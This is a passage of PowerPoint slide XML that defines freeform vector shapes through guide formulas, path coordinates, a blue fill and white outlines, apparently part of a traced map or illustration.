                  <a:gd name="T53" fmla="*/ 4 h 13"/>
                  <a:gd name="T54" fmla="*/ 5 w 14"/>
                  <a:gd name="T55" fmla="*/ 3 h 13"/>
                  <a:gd name="T56" fmla="*/ 3 w 14"/>
                  <a:gd name="T57" fmla="*/ 2 h 13"/>
                  <a:gd name="T58" fmla="*/ 3 w 14"/>
                  <a:gd name="T59" fmla="*/ 2 h 13"/>
                  <a:gd name="T60" fmla="*/ 5 w 14"/>
                  <a:gd name="T61" fmla="*/ 2 h 13"/>
                  <a:gd name="T62" fmla="*/ 6 w 14"/>
                  <a:gd name="T63" fmla="*/ 1 h 13"/>
                  <a:gd name="T64" fmla="*/ 7 w 14"/>
                  <a:gd name="T65" fmla="*/ 1 h 13"/>
                  <a:gd name="T66" fmla="*/ 10 w 14"/>
                  <a:gd name="T67" fmla="*/ 1 h 13"/>
                  <a:gd name="T68" fmla="*/ 11 w 14"/>
                  <a:gd name="T69" fmla="*/ 1 h 13"/>
                  <a:gd name="T70" fmla="*/ 13 w 14"/>
                  <a:gd name="T71" fmla="*/ 0 h 13"/>
                  <a:gd name="T72" fmla="*/ 14 w 14"/>
                  <a:gd name="T73" fmla="*/ 0 h 13"/>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4"/>
                  <a:gd name="T112" fmla="*/ 0 h 13"/>
                  <a:gd name="T113" fmla="*/ 14 w 14"/>
                  <a:gd name="T114" fmla="*/ 13 h 13"/>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4" h="13">
                    <a:moveTo>
                      <a:pt x="14" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36167" name="Freeform 300"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1755" y="2771"/>
                <a:ext cx="14" cy="13"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 14"/>
                  <a:gd name="T1" fmla="*/ 0 h 13"/>
                  <a:gd name="T2" fmla="*/ 14 w 14"/>
                  <a:gd name="T3" fmla="*/ 2 h 13"/>
                  <a:gd name="T4" fmla="*/ 13 w 14"/>
                  <a:gd name="T5" fmla="*/ 2 h 13"/>
                  <a:gd name="T6" fmla="*/ 12 w 14"/>
                  <a:gd name="T7" fmla="*/ 3 h 13"/>
                  <a:gd name="T8" fmla="*/ 13 w 14"/>
                  <a:gd name="T9" fmla="*/ 5 h 13"/>
                  <a:gd name="T10" fmla="*/ 12 w 14"/>
                  <a:gd name="T11" fmla="*/ 6 h 13"/>
                  <a:gd name="T12" fmla="*/ 13 w 14"/>
                  <a:gd name="T13" fmla="*/ 8 h 13"/>
                  <a:gd name="T14" fmla="*/ 13 w 14"/>
                  <a:gd name="T15" fmla="*/ 12 h 13"/>
                  <a:gd name="T16" fmla="*/ 10 w 14"/>
                  <a:gd name="T17" fmla="*/ 13 h 13"/>
                  <a:gd name="T18" fmla="*/ 9 w 14"/>
                  <a:gd name="T19" fmla="*/ 13 h 13"/>
                  <a:gd name="T20" fmla="*/ 8 w 14"/>
                  <a:gd name="T21" fmla="*/ 13 h 13"/>
                  <a:gd name="T22" fmla="*/ 4 w 14"/>
                  <a:gd name="T23" fmla="*/ 13 h 13"/>
                  <a:gd name="T24" fmla="*/ 3 w 14"/>
                  <a:gd name="T25" fmla="*/ 13 h 13"/>
                  <a:gd name="T26" fmla="*/ 2 w 14"/>
                  <a:gd name="T27" fmla="*/ 12 h 13"/>
                  <a:gd name="T28" fmla="*/ 0 w 14"/>
                  <a:gd name="T29" fmla="*/ 12 h 13"/>
                  <a:gd name="T30" fmla="*/ 0 w 14"/>
                  <a:gd name="T31" fmla="*/ 12 h 13"/>
                  <a:gd name="T32" fmla="*/ 0 w 14"/>
                  <a:gd name="T33" fmla="*/ 12 h 13"/>
                  <a:gd name="T34" fmla="*/ 1 w 14"/>
                  <a:gd name="T35" fmla="*/ 11 h 13"/>
                  <a:gd name="T36" fmla="*/ 3 w 14"/>
                  <a:gd name="T37" fmla="*/ 10 h 13"/>
                  <a:gd name="T38" fmla="*/ 3 w 14"/>
                  <a:gd name="T39" fmla="*/ 10 h 13"/>
                  <a:gd name="T40" fmla="*/ 4 w 14"/>
                  <a:gd name="T41" fmla="*/ 10 h 13"/>
                  <a:gd name="T42" fmla="*/ 5 w 14"/>
                  <a:gd name="T43" fmla="*/ 10 h 13"/>
                  <a:gd name="T44" fmla="*/ 6 w 14"/>
                  <a:gd name="T45" fmla="*/ 9 h 13"/>
                  <a:gd name="T46" fmla="*/ 5 w 14"/>
                  <a:gd name="T47" fmla="*/ 7 h 13"/>
                  <a:gd name="T48" fmla="*/ 6 w 14"/>
                  <a:gd name="T49" fmla="*/ 6 h 13"/>
                  <a:gd name="T50" fmla="*/ 6 w 14"/>
                  <a:gd name="T51" fmla="*/ 5 h 13"/>
                  <a:gd name="T52" fmla="*/ 5 w 14"/>
                  <a:gd name="T53" fmla="*/ 4 h 13"/>
                  <a:gd name="T54" fmla="*/ 5 w 14"/>
                  <a:gd name="T55" fmla="*/ 3 h 13"/>
                  <a:gd name="T56" fmla="*/ 3 w 14"/>
                  <a:gd name="T57" fmla="*/ 2 h 13"/>
                  <a:gd name="T58" fmla="*/ 3 w 14"/>
                  <a:gd name="T59" fmla="*/ 2 h 13"/>
                  <a:gd name="T60" fmla="*/ 5 w 14"/>
                  <a:gd name="T61" fmla="*/ 2 h 13"/>
                  <a:gd name="T62" fmla="*/ 6 w 14"/>
                  <a:gd name="T63" fmla="*/ 1 h 13"/>
                  <a:gd name="T64" fmla="*/ 7 w 14"/>
                  <a:gd name="T65" fmla="*/ 1 h 13"/>
                  <a:gd name="T66" fmla="*/ 10 w 14"/>
                  <a:gd name="T67" fmla="*/ 1 h 13"/>
                  <a:gd name="T68" fmla="*/ 11 w 14"/>
                  <a:gd name="T69" fmla="*/ 1 h 13"/>
                  <a:gd name="T70" fmla="*/ 13 w 14"/>
                  <a:gd name="T71" fmla="*/ 0 h 13"/>
                  <a:gd name="T72" fmla="*/ 14 w 14"/>
                  <a:gd name="T73" fmla="*/ 0 h 13"/>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4"/>
                  <a:gd name="T112" fmla="*/ 0 h 13"/>
                  <a:gd name="T113" fmla="*/ 14 w 14"/>
                  <a:gd name="T114" fmla="*/ 13 h 13"/>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4" h="13">
                    <a:moveTo>
                      <a:pt x="14" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36168" name="Freeform 301"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1423" y="2790"/>
                <a:ext cx="92" cy="40"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10 w 92"/>
                  <a:gd name="T1" fmla="*/ 3 h 40"/>
                  <a:gd name="T2" fmla="*/ 11 w 92"/>
                  <a:gd name="T3" fmla="*/ 10 h 40"/>
                  <a:gd name="T4" fmla="*/ 18 w 92"/>
                  <a:gd name="T5" fmla="*/ 11 h 40"/>
                  <a:gd name="T6" fmla="*/ 23 w 92"/>
                  <a:gd name="T7" fmla="*/ 13 h 40"/>
                  <a:gd name="T8" fmla="*/ 31 w 92"/>
                  <a:gd name="T9" fmla="*/ 13 h 40"/>
                  <a:gd name="T10" fmla="*/ 45 w 92"/>
                  <a:gd name="T11" fmla="*/ 7 h 40"/>
                  <a:gd name="T12" fmla="*/ 57 w 92"/>
                  <a:gd name="T13" fmla="*/ 1 h 40"/>
                  <a:gd name="T14" fmla="*/ 63 w 92"/>
                  <a:gd name="T15" fmla="*/ 3 h 40"/>
                  <a:gd name="T16" fmla="*/ 74 w 92"/>
                  <a:gd name="T17" fmla="*/ 4 h 40"/>
                  <a:gd name="T18" fmla="*/ 83 w 92"/>
                  <a:gd name="T19" fmla="*/ 11 h 40"/>
                  <a:gd name="T20" fmla="*/ 87 w 92"/>
                  <a:gd name="T21" fmla="*/ 18 h 40"/>
                  <a:gd name="T22" fmla="*/ 92 w 92"/>
                  <a:gd name="T23" fmla="*/ 27 h 40"/>
                  <a:gd name="T24" fmla="*/ 89 w 92"/>
                  <a:gd name="T25" fmla="*/ 30 h 40"/>
                  <a:gd name="T26" fmla="*/ 84 w 92"/>
                  <a:gd name="T27" fmla="*/ 31 h 40"/>
                  <a:gd name="T28" fmla="*/ 83 w 92"/>
                  <a:gd name="T29" fmla="*/ 34 h 40"/>
                  <a:gd name="T30" fmla="*/ 80 w 92"/>
                  <a:gd name="T31" fmla="*/ 40 h 40"/>
                  <a:gd name="T32" fmla="*/ 74 w 92"/>
                  <a:gd name="T33" fmla="*/ 28 h 40"/>
                  <a:gd name="T34" fmla="*/ 74 w 92"/>
                  <a:gd name="T35" fmla="*/ 23 h 40"/>
                  <a:gd name="T36" fmla="*/ 82 w 92"/>
                  <a:gd name="T37" fmla="*/ 24 h 40"/>
                  <a:gd name="T38" fmla="*/ 78 w 92"/>
                  <a:gd name="T39" fmla="*/ 21 h 40"/>
                  <a:gd name="T40" fmla="*/ 75 w 92"/>
                  <a:gd name="T41" fmla="*/ 20 h 40"/>
                  <a:gd name="T42" fmla="*/ 71 w 92"/>
                  <a:gd name="T43" fmla="*/ 17 h 40"/>
                  <a:gd name="T44" fmla="*/ 69 w 92"/>
                  <a:gd name="T45" fmla="*/ 13 h 40"/>
                  <a:gd name="T46" fmla="*/ 66 w 92"/>
                  <a:gd name="T47" fmla="*/ 12 h 40"/>
                  <a:gd name="T48" fmla="*/ 65 w 92"/>
                  <a:gd name="T49" fmla="*/ 11 h 40"/>
                  <a:gd name="T50" fmla="*/ 57 w 92"/>
                  <a:gd name="T51" fmla="*/ 10 h 40"/>
                  <a:gd name="T52" fmla="*/ 51 w 92"/>
                  <a:gd name="T53" fmla="*/ 12 h 40"/>
                  <a:gd name="T54" fmla="*/ 51 w 92"/>
                  <a:gd name="T55" fmla="*/ 17 h 40"/>
                  <a:gd name="T56" fmla="*/ 45 w 92"/>
                  <a:gd name="T57" fmla="*/ 20 h 40"/>
                  <a:gd name="T58" fmla="*/ 40 w 92"/>
                  <a:gd name="T59" fmla="*/ 23 h 40"/>
                  <a:gd name="T60" fmla="*/ 43 w 92"/>
                  <a:gd name="T61" fmla="*/ 28 h 40"/>
                  <a:gd name="T62" fmla="*/ 47 w 92"/>
                  <a:gd name="T63" fmla="*/ 34 h 40"/>
                  <a:gd name="T64" fmla="*/ 45 w 92"/>
                  <a:gd name="T65" fmla="*/ 35 h 40"/>
                  <a:gd name="T66" fmla="*/ 40 w 92"/>
                  <a:gd name="T67" fmla="*/ 38 h 40"/>
                  <a:gd name="T68" fmla="*/ 34 w 92"/>
                  <a:gd name="T69" fmla="*/ 38 h 40"/>
                  <a:gd name="T70" fmla="*/ 33 w 92"/>
                  <a:gd name="T71" fmla="*/ 36 h 40"/>
                  <a:gd name="T72" fmla="*/ 29 w 92"/>
                  <a:gd name="T73" fmla="*/ 27 h 40"/>
                  <a:gd name="T74" fmla="*/ 22 w 92"/>
                  <a:gd name="T75" fmla="*/ 29 h 40"/>
                  <a:gd name="T76" fmla="*/ 19 w 92"/>
                  <a:gd name="T77" fmla="*/ 24 h 40"/>
                  <a:gd name="T78" fmla="*/ 9 w 92"/>
                  <a:gd name="T79" fmla="*/ 21 h 40"/>
                  <a:gd name="T80" fmla="*/ 2 w 92"/>
                  <a:gd name="T81" fmla="*/ 22 h 40"/>
                  <a:gd name="T82" fmla="*/ 1 w 92"/>
                  <a:gd name="T83" fmla="*/ 21 h 40"/>
                  <a:gd name="T84" fmla="*/ 2 w 92"/>
                  <a:gd name="T85" fmla="*/ 17 h 40"/>
                  <a:gd name="T86" fmla="*/ 4 w 92"/>
                  <a:gd name="T87" fmla="*/ 11 h 40"/>
                  <a:gd name="T88" fmla="*/ 1 w 92"/>
                  <a:gd name="T89" fmla="*/ 4 h 40"/>
                  <a:gd name="T90" fmla="*/ 2 w 92"/>
                  <a:gd name="T91" fmla="*/ 1 h 40"/>
                  <a:gd name="T92" fmla="*/ 6 w 92"/>
                  <a:gd name="T93" fmla="*/ 1 h 40"/>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92"/>
                  <a:gd name="T142" fmla="*/ 0 h 40"/>
                  <a:gd name="T143" fmla="*/ 92 w 92"/>
                  <a:gd name="T144" fmla="*/ 40 h 40"/>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92" h="40">
                    <a:moveTo>
                      <a:pt x="6" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36169" name="Freeform 302"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1423" y="2790"/>
                <a:ext cx="92" cy="40"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10 w 92"/>
                  <a:gd name="T1" fmla="*/ 3 h 40"/>
                  <a:gd name="T2" fmla="*/ 11 w 92"/>
                  <a:gd name="T3" fmla="*/ 10 h 40"/>
                  <a:gd name="T4" fmla="*/ 18 w 92"/>
                  <a:gd name="T5" fmla="*/ 11 h 40"/>
                  <a:gd name="T6" fmla="*/ 23 w 92"/>
                  <a:gd name="T7" fmla="*/ 13 h 40"/>
                  <a:gd name="T8" fmla="*/ 31 w 92"/>
                  <a:gd name="T9" fmla="*/ 13 h 40"/>
                  <a:gd name="T10" fmla="*/ 45 w 92"/>
                  <a:gd name="T11" fmla="*/ 7 h 40"/>
                  <a:gd name="T12" fmla="*/ 57 w 92"/>
                  <a:gd name="T13" fmla="*/ 1 h 40"/>
                  <a:gd name="T14" fmla="*/ 63 w 92"/>
                  <a:gd name="T15" fmla="*/ 3 h 40"/>
                  <a:gd name="T16" fmla="*/ 74 w 92"/>
                  <a:gd name="T17" fmla="*/ 4 h 40"/>
                  <a:gd name="T18" fmla="*/ 83 w 92"/>
                  <a:gd name="T19" fmla="*/ 11 h 40"/>
                  <a:gd name="T20" fmla="*/ 87 w 92"/>
                  <a:gd name="T21" fmla="*/ 18 h 40"/>
                  <a:gd name="T22" fmla="*/ 92 w 92"/>
                  <a:gd name="T23" fmla="*/ 27 h 40"/>
                  <a:gd name="T24" fmla="*/ 89 w 92"/>
                  <a:gd name="T25" fmla="*/ 30 h 40"/>
                  <a:gd name="T26" fmla="*/ 84 w 92"/>
                  <a:gd name="T27" fmla="*/ 31 h 40"/>
                  <a:gd name="T28" fmla="*/ 83 w 92"/>
                  <a:gd name="T29" fmla="*/ 34 h 40"/>
                  <a:gd name="T30" fmla="*/ 80 w 92"/>
                  <a:gd name="T31" fmla="*/ 40 h 40"/>
                  <a:gd name="T32" fmla="*/ 74 w 92"/>
                  <a:gd name="T33" fmla="*/ 28 h 40"/>
                  <a:gd name="T34" fmla="*/ 74 w 92"/>
                  <a:gd name="T35" fmla="*/ 23 h 40"/>
                  <a:gd name="T36" fmla="*/ 82 w 92"/>
                  <a:gd name="T37" fmla="*/ 24 h 40"/>
                  <a:gd name="T38" fmla="*/ 78 w 92"/>
                  <a:gd name="T39" fmla="*/ 21 h 40"/>
                  <a:gd name="T40" fmla="*/ 75 w 92"/>
                  <a:gd name="T41" fmla="*/ 20 h 40"/>
                  <a:gd name="T42" fmla="*/ 71 w 92"/>
                  <a:gd name="T43" fmla="*/ 17 h 40"/>
                  <a:gd name="T44" fmla="*/ 69 w 92"/>
                  <a:gd name="T45" fmla="*/ 13 h 40"/>
                  <a:gd name="T46" fmla="*/ 66 w 92"/>
                  <a:gd name="T47" fmla="*/ 12 h 40"/>
                  <a:gd name="T48" fmla="*/ 65 w 92"/>
                  <a:gd name="T49" fmla="*/ 11 h 40"/>
                  <a:gd name="T50" fmla="*/ 57 w 92"/>
